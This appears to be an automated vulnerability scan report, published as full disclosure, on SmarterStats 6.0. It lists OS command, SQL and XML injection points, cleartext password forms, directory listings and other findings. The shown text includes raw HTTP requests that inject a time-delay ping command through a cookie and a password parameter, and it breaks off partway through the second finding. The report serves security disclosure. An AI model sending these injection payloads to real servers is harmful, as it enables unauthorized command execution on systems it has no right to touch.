Default Installation, SmarterStats 6.0, XML Injection, OS Command Execution, Smarter Stats Web Server, Report of October 2010


SmarterStats 6.2 report updated on May 20, 2011 with Stored and Reflected XSS.
This report was generated by XSS.CX Research Blog on Windows 2008 R2 Server, 64 Bit, at Tue Oct 12 15:20:59 CDT 2010, with respect to SmarterStats 6.0 with SmarterTools Web Server (bundled in download).


1. OS command injection

1.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [STTTState cookie]

1.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtAdminNewPassword_SettingText parameter]

1.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

1.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter]

1.5. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

1.6. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00_MPH_grdLogLocations_HiddenLSR parameter]

2. SQL injection

2.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

2.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter]

2.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

2.4. http://vulnerable.smarterstats.6.0.host:9999/Default.aspx [ctl00%24PageTitle parameter]

2.5. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.6. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.7. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.8. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [Referer HTTP header]

2.9. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.10. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.11. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.12. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

2.13. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

2.14. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

2.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

2.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [User-Agent HTTP header]

2.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

2.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.21. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [Referer HTTP header]

2.22. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [STHashCookie cookie]

2.23. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [ReportType parameter]


SmarterStats 6.0, CWE-31, CWE-89, CAPEC-66, CAPEC-213, CAPEC-88

Hoyt LLC Research | Full Disclosure | As of March 14, 2011


3. XML injection

3.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STHashCookie cookie]

3.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STTTState cookie]

3.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [SelectedLanguage cookie]

3.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [loginsettings cookie]

3.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STHashCookie cookie]

3.6. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STTTState cookie]

3.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [SelectedLanguage cookie]

3.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [loginsettings cookie]

3.9. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [reportID parameter]

3.10. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STHashCookie cookie]

3.11. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STTTState cookie]

3.12. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [SelectedLanguage cookie]

3.13. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [loginsettings cookie]

3.14. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [subReportName parameter]

3.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

3.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

3.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

3.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

3.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

3.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

4. Cleartext submission of password

4.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

4.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

4.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

4.4. http://vulnerable.smarterstats.6.0.host:9999/Client/frmUser.aspx

4.5. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

5. Cross-domain Referer leakage

5.1. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

5.2. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

5.3. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.4. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.5. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.6. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

6. Cookie without HttpOnly flag set

7. Password field with autocomplete enabled

7.1. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

7.2. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

8. Directory listing

8.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/

8.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/

8.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/GettingStarted/

8.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/Popups/

8.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/

8.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/

8.7. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/

8.8. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/BrowserOverrides/

8.9. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Error/

8.10. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/FileDownload/

8.11. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/GettingStarted/

8.12. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Internal/

8.13. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Login/

8.14. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Mail/

8.15. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Main/

8.16. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Popup/

8.17. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Portal/

8.18. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Print/

8.19. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Reporting/

8.20. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Stats/

8.21. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Track/

8.22. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Wizard/

8.23. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/

8.24. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/

8.25. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/Img/

8.26. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Combobox/

8.27. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Common/

8.28. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/

8.29. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/Img/

8.30. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Grid/

8.31. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Input/

8.32. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/

8.33. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/Img/

8.34. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/

8.35. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/Img/

8.36. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/

8.37. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/Img/

8.38. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/

8.39. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/CssImg/

8.40. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/Img/

8.41. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Flash/

8.42. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/

8.43. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/Pager/

8.44. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Javascript/

8.45. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Sounds/

8.46. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/

8.47. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/

8.48. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/Pager/

8.49. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/

8.50. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/Button/

8.51. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Plupload/

8.52. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/

8.53. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/DragDrop/

8.54. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuInternal/

8.55. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuTrack/

8.56. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/

8.57. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/rollover/

8.58. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenu/

8.59. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenustats/

8.60. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/

8.61. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/tree/

8.62. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/skin/

8.63. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/social_icons/

8.64. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/stats/

8.65. http://vulnerable.smarterstats.6.0.host:9999/Client/

8.66. http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/

8.67. http://vulnerable.smarterstats.6.0.host:9999/Services/

8.68. http://vulnerable.smarterstats.6.0.host:9999/Temp/

8.69. http://vulnerable.smarterstats.6.0.host:9999/UserControls/

8.70. http://vulnerable.smarterstats.6.0.host:9999/UserControls/PanelBarTemplates/

8.71. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/

8.72. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/

8.73. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/

9. Email addresses disclosed

9.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

9.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

10. Content type incorrectly stated

10.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

10.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx

10.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx

10.4. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/AboutThisFolder.txt

10.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

10.6. http://vulnerable.smarterstats.6.0.host:9999/Temp/0c2c2823b31f46149208732c08a4fee8.jpg

10.7. http://vulnerable.smarterstats.6.0.host:9999/Temp/1039b7037bea4372821b6b290d0745da.jpg

10.8. http://vulnerable.smarterstats.6.0.host:9999/Temp/1d4802d431604203a5254435a7181b01.jpg

10.9. http://vulnerable.smarterstats.6.0.host:9999/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg

10.10. http://vulnerable.smarterstats.6.0.host:9999/Temp/20226bc24c8e4c89926647164054826e.jpg

10.11. http://vulnerable.smarterstats.6.0.host:9999/Temp/26da1ed6256b4e7f89617f968309aea9.jpg

10.12. http://vulnerable.smarterstats.6.0.host:9999/Temp/272276131291426282a9ebb0efad2752.jpg

10.13. http://vulnerable.smarterstats.6.0.host:9999/Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg

10.14. http://vulnerable.smarterstats.6.0.host:9999/Temp/3022c349e42e4a16915d331a96969eb5.jpg

10.15. http://vulnerable.smarterstats.6.0.host:9999/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg

10.16. http://vulnerable.smarterstats.6.0.host:9999/Temp/356d07443f3445d88a06bf724a953c85.jpg

10.17. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a06471f3515434aa5438ccdb1d520e8.jpg

10.18. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg

10.19. http://vulnerable.smarterstats.6.0.host:9999/Temp/47b58eea1f494809bf127e28495c2dd7.jpg

10.20. http://vulnerable.smarterstats.6.0.host:9999/Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg

10.21. http://vulnerable.smarterstats.6.0.host:9999/Temp/53bea176ee1943dd981fd05e032eff33.jpg

10.22. http://vulnerable.smarterstats.6.0.host:9999/Temp/56dd80bb97d8414fbcfd594ed4282909.jpg

10.23. http://vulnerable.smarterstats.6.0.host:9999/Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg

10.24. http://vulnerable.smarterstats.6.0.host:9999/Temp/5bf056fa42644067bd0099f9d59829e2.jpg

10.25. http://vulnerable.smarterstats.6.0.host:9999/Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg

10.26. http://vulnerable.smarterstats.6.0.host:9999/Temp/610228c0ba7b4ab6803b2930991bc819.jpg

10.27. http://vulnerable.smarterstats.6.0.host:9999/Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg

10.28. http://vulnerable.smarterstats.6.0.host:9999/Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg

10.29. http://vulnerable.smarterstats.6.0.host:9999/Temp/78969dd70ff94762832f8dc8e7f76105.jpg

10.30. http://vulnerable.smarterstats.6.0.host:9999/Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg

10.31. http://vulnerable.smarterstats.6.0.host:9999/Temp/8494271a59234d898cdd787b473092ed.jpg

10.32. http://vulnerable.smarterstats.6.0.host:9999/Temp/869b700a3e8b4973a5fdd0981173fbce.jpg

10.33. http://vulnerable.smarterstats.6.0.host:9999/Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg

10.34. http://vulnerable.smarterstats.6.0.host:9999/Temp/91331a080c0148b0bddd5d75991acb5b.jpg

10.35. http://vulnerable.smarterstats.6.0.host:9999/Temp/9b829667b5214dbb92b4f41517bde32f.jpg

10.36. http://vulnerable.smarterstats.6.0.host:9999/Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg

10.37. http://vulnerable.smarterstats.6.0.host:9999/Temp/AboutThisFolder.txt

10.38. http://vulnerable.smarterstats.6.0.host:9999/Temp/a1b92ef93b1b4be78245313c2d051569.jpg

10.39. http://vulnerable.smarterstats.6.0.host:9999/Temp/a61092b27bce47aa8accac88254b740c.jpg

10.40. http://vulnerable.smarterstats.6.0.host:9999/Temp/a796b3465add49de8e0c091a308040ff.jpg

10.41. http://vulnerable.smarterstats.6.0.host:9999/Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg

10.42. http://vulnerable.smarterstats.6.0.host:9999/Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg

10.43. http://vulnerable.smarterstats.6.0.host:9999/Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg

10.44. http://vulnerable.smarterstats.6.0.host:9999/Temp/afa9a3022c3e456690253161fd12125c.jpg

10.45. http://vulnerable.smarterstats.6.0.host:9999/Temp/b2972344c54b45e38070638051bc9478.jpg

10.46. http://vulnerable.smarterstats.6.0.host:9999/Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg

10.47. http://vulnerable.smarterstats.6.0.host:9999/Temp/b970dd6404e94f54894db427147a64da.jpg

10.48. http://vulnerable.smarterstats.6.0.host:9999/Temp/b994a8c169af455497c7747bd9914800.jpg

10.49. http://vulnerable.smarterstats.6.0.host:9999/Temp/c77c8b574b60474b8ac78495f6f074dc.jpg

10.50. http://vulnerable.smarterstats.6.0.host:9999/Temp/cc02654a98df41d6bd5a3edd66c42234.jpg

10.51. http://vulnerable.smarterstats.6.0.host:9999/Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg

10.52. http://vulnerable.smarterstats.6.0.host:9999/Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg

10.53. http://vulnerable.smarterstats.6.0.host:9999/Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg

10.54. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg

10.55. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg

10.56. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0463b7c1a16472f90db2c0647d531bf.jpg

10.57. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0b1d954de574491a98b97217656a58a.jpg

10.58. http://vulnerable.smarterstats.6.0.host:9999/Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg

10.59. http://vulnerable.smarterstats.6.0.host:9999/Temp/f8ef6da096584c109a8620d83d0d2462.jpg

10.60. http://vulnerable.smarterstats.6.0.host:9999/default.aspx

10.61. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

11. Content type is not specified

11.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx

11.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx

11.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx

11.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

11.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/ButtonBarIcons.xml

11.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Skin.xml

11.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx

11.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx

11.9. http://vulnerable.smarterstats.6.0.host:9999/Services/Web.config

11.10. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/4_0_30319/

11.11. http://vulnerable.smarterstats.6.0.host:9999/clientaccesspolicy.xml

11.12. http://vulnerable.smarterstats.6.0.host:9999/cloudscan.exe

11.13. http://vulnerable.smarterstats.6.0.host:9999/crossdomain.xml

11.14. http://vulnerable.smarterstats.6.0.host:9999/sitemap.xml



1. OS command injection
There are 6 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands beyond the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [STTTState cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The STTTState cookie appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the STTTState cookie. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=%26ping%20-n%2020%20127.0.0.1%26
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[...]&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngi
nes_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:51:26 GMT
Content-Length: 0


1.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtAdminNewPassword_SettingText parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtAdminNewPassword_SettingText parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24txtAdminNewPassword_SettingText parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
